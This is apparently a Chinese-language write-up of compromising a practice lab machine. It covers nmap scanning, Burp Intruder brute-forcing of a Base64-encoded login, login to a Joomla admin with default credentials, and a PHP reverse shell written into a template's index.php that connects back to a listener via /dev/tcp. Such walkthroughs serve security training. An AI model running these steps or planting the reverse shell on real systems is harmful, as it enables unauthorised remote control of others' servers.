首先,开启命令行窗口输入ifconfig查看IP地址

端口扫描
nmap
nmap 192.168.190.*
Kali所属的网段进行全网段扫描,其中*表示通配符0~255。观察开放端口,及对应的不同服务

如果开放的端口有80端口,推测该主机很有可能是一个网站服务器,在浏览器中的地址栏中输入此地址192.168.190.153尝试进行访问。

进一步扫描该靶场开放的端口信息
nmap -T4 -sV -A 192.168.190.153
-T4 提高扫描速度,-sV 检测服务版本,-A 启用高级扫描选项如操作系统探测和脚本扫描。

依次访问端口查看开放了什么服务
192.168.31.182:8080 # HTTP

抓包,发现是base64加密,类似于tomcat的用户名和密码格式


放到intruder模块,爆破


爆破得到用户名和密码
登录进来

发现是joomla搭建的,直接登后台,默认用户名和密码,joomla,joomla

进来找到index.php



写入反弹shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.224.130/5555 0>&1'");
?>
点击TemplatePreview预览index.php
端口监听,成功
